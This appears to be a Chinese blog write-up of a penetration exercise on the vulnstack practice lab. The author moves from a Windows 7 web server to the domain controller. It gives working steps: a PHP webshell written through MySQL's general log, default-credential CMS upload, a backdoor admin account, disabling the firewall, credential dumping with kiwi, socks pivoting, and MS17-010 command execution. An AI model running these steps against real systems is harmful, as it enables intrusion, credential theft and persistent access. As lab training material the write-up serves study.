一.搭建vulnstack靶场环境
主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
这次靶场一共三个环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张网卡,一张nat模式,一张主机模式,win2003是域成员,win2008为域控
Win7配置如下:
在win7中使用phpstudy开启环境,然后在win7中ping各主机,保持各个主机之间能够互相访问,在自己的攻击机中能访问到win7的网站页面。至此,环境已经搭建完毕。
二.官方提供的流程
环境官方有提供相关的渗透流程为:
一、环境搭建
1.环境搭建测试
2.信息收集
二、漏洞利用
3.漏洞搜索与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集
三、内网搜集
7.内网–继续信息收集
8.内网攻击姿势–信息泄露
9.内网攻击姿势-MS08-067
10.内网攻击姿势-SMB远程桌面口令猜测
11.内网攻击姿势-Oracle数据库TNS服务漏洞
12.内网攻击姿势-RPC DCOM服务漏洞
四、横向移动
13.内网其它主机端口-文件读取
14.内网其它主机端口-redis
15.内网其它主机端口-redis Getshell
16.内网其它主机端口-MySQL数据库
17.内网其它主机端口-MySQL提权
五、构建通道
18.内网其它主机端口-代理转发
六、持久控制
19.域渗透-域成员信息收集
20.域渗透-基础服务弱口令探测及深度利用之powershell
21.域渗透-横向移动[wmi利用]
22.域渗透-C2命令执行
23.域渗透-利用DomainFronting实现对beacon的深度隐藏
24.域渗透-域控实现与利用
七、痕迹清理
25、日志清理
三.开始内网渗透
1.我们开始初步的步骤,先进行信息收集
暴露在外网的是win7的web服务,ip地址为192.168.137.130,先用nmap和dirsearch对其进行操作系统,端口版本信息,目录进行扫描,
2.根据收集到的信息渗透web服务器
我们可以看到端口就开放了80,3306,操作系统版本为win系列低版本,目录的话扫描出了网站备份,phpstudy的探针和phpmyadmin页面(其实我最后看大佬们的攻略,应该有一个yxcms的cms目录的,但是我的字典太垃圾了,没有扫到),接下来就是三个目标了,一是下载beifen.rar文件然后开始查看网站构成,二是登陆phpmyadmin,爆破账号密码查看数据库,三是用nmap扫描对方有没有相应的win系列低版本漏洞,我们就一边下载网站备份文件进行查看,一边爆破phpmyadmin的账号密码。
打开网站的备份文件,发现是一个名为yxcms的源码,应该确认网站应该是有yxcms搭成的网页,另外查看config文件,数据库的账号密码已经获得,同时我们得知版本应为1.2.1我们再在url中查看/yxcms,进入网站我们可以看到首页如下:
现在我们有三条路,一是按照版本为1.2.1的yxcms找它相关的漏洞获取权限,二是走phpmyadmin写入一句话获取权限,三是用nmap扫描目标是否有系统漏洞,我们先走第一条路试一试。
(1)1.2.1 yxcms
打开默认管理员登陆得后台yxcms/index.php?r=admin/index/login,使用默认账号密码admin 123456进行登陆,登陆成功,在后台的前台模板中有一个上传php的功能
我们上传一个一句话木马进行尝试,不过在上传过程中抓包没有回显上传后的地址,幸亏我们有网站备份,在中间搜索这些前台模板所在文件地址,发现地址为yxcms\protected\apps\default\view\default\123.php,所以我们尝试连接一句话木马,连接成功,下来查看ipconfig,发现这台电脑有两个网段,可能是一个内网网段,一个外网地址
(2)通过phpmyadmin获得webshell
通过爆破,发现phpmyadmin的账号密码为root root,登陆之后先查看是否有写入权限,show VARIABLES like ‘%secure%’
当我们查看mysql中的 secure_file_priv参数时,发现它的默认值是NULL,表示限制不能导入导出,当我们进行修改的时候就会报错,因为secure_file_priv参数是一个只读参数,不能通过set global命令修改,这表示我们不能直接outfile写入一句话了,我们尝试利用日志写入一句话木马,我们执行sql语句show global variables like ‘%general%’,查看日志功能的情况
日志功能是关闭的,我们打开它set global general_log=‘ON’,然后将日志文件的存放位置修改为当前网站的根目录(根据刚才的那个phpstudy探针显示的地址),执行sql语句set global general_log_file = ‘C:/phpStudy/WWW/123.php’,然后我们再使用show global variables like ‘%general%‘查看,发现都已经设置好
下来就是执行一句话木马,让日志记录下来
select’<?php @eval($_POST["123"]); ?>’
发现执行成功,我们用蚁剑进行连接,连接成功,发现是有一个内网地址和一个外网地址
(3)直接通过系统版本漏洞进行攻击
我们通过刚开始的nmap扫描和phpstudy的探针,已经确定对方的web服务器为win7,我们就从win7的操作系统漏洞入手查看对方是否拥有,结果不出所料,对方只开启了80和3306,其他类似445,3389的端口都没开启,没办法了,思路一条(如果大佬们有其他办法,可以一起讨论讨论),这条路走不通
总结:在渗透这台web服务器的过程中,只有两条路走的通,一条就是通过cms的漏洞,上传一句话木马文件获得webshell,另一个就是通过phpmyadmin写入webshell,系统漏洞方面暂时没有更好的想法,这就是从外网进入内网的一步。
3.从web服务器到内网拿到域控
现在web服务器已经到了我们手中,接下来要做的就是从web服务器横向移动拿到这个内网的域控了,不过现在我们是在用冰蝎进行连接,有点不舒服,我们直接用冰蝎的反弹shell功能直接把会话转到我们攻击机的Linux的msf上。
但是效果有点不好,在进行shell操作的时候会话容易直接死掉,我们再通过冰蝎上传一个msf的exe木马,效果非常好,感觉刚才那个php的反弹shell跟假的一样,下来我们就开始内网渗透。
在刚开始的信息收集中我们知道win7机器只开启了80和3306,我们先开启他的3389端口,使用run getgui -e
下来进入shell模式中(在进入shell模式有乱码现象,输入chcp 65001即可),我们可以通过netstat -an可以看到3389已经处于listening状态了,我们进入之后是administrator权限,先不进行提权,开启3389过程中我们也要创一个自己的账户啊,留一后手,先创建一个账户test,net user test Admin123 /add,然后把test账号添加到当地administrator组里面,net localgroup administrators test /add,这就已经创建好了,我们可以远程登录看看。
登录成功,下来我们就是收集当前机器的信息。
可以看到当前的机器是存在一个名为god.org的域内的,在确定已经是一个域用户之后,然后我们使用msf的getsystem提下权
我们可以看到已经提到system权限了,下来直接加载minikatz抓取这台机器的账号密码,使用load kiwi加载猕猴桃
在此之间记得迁移进程,然后使用credes_all抓取所有密码
当前的明文密码已经抓取到了(administrator的密码我打了一下马赛克),然后查看防火墙状况netsh firewall show state,并使用netsh advfirewall set allprofiles state off关掉防火墙
使用net view确定域内的计算机
我们使用net time /domain来确定域控主机
我们已经知道了域控主机为owa,然后开始横向渗透,先自动创建路由run post/multi/manage/autoroute
把当前会话挂起来,通过post/multi/manage/autoroute这个模块查看路由表,并指定session为刚才的会话
然后我们使用auxiliary/server/socks_proxy这个模块开启socks代理,设置我们自己的服务器ip和端口,运行
下来我们使用msf自带的扫描模块use auxiliary/scanner/netbios/nbname来扫描192.168.52.0/24这个网段,查看存活主机
成功发现三台,一台就是我们刚才攻陷的web服务器STU1,另外我们已经在刚才的信息收集当中知道了域控的名字为OWA,所以我们下来的主要目标就是域控了,他的ip地址为192.168.52.138,下来我们对其端口进行详细的扫描,使用msf的扫描端口模块,use auxiliary/scanner/postscan/tcp,扫描对应的端口
扫描过程中看到了445,立马兴奋了起来,先使用大家最熟悉的永恒之蓝扫一波,看看有没有
发现有,我们打一波试一试,不过在这里我们需要注意一下,因为我们现在挂着有socks代理,所以我们不能使用反向链接了,需要正向的。
最后没有成功,推测应该是开启了防火墙,我们先使用command执行关闭防火墙指令,然后在用永恒之蓝攻击试试看,结果失败,不过我们还可以使用ms17_010command漏洞执行命令,在关闭防火墙的基础上,我们添加用户账号,添加到administraror组里面,先远控win7机器,再远控域控
已经可以看到这已经添加成功了,然后我们打开3389端口set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 这是因为msf里面的引号需要转义,原命令为REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
这已经开启成功了,然后我们就先远控win7,然后再用win7远控域控
成功了,不过中间我用linux攻击机直接开代理远控能连接到,但是账号密码总不对,有点搞不懂,其实还有另一个办法,就是直接用wmi,psexec等工具直接使用账号密码横向移动,不过那个就先不搞了,想测试的就是在不知道密码的账号下进行内网渗透,这一套流程走下来,感觉官方的流程好强啊,下来可以再学学别的大佬都是怎么过这个靶场的
2140
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
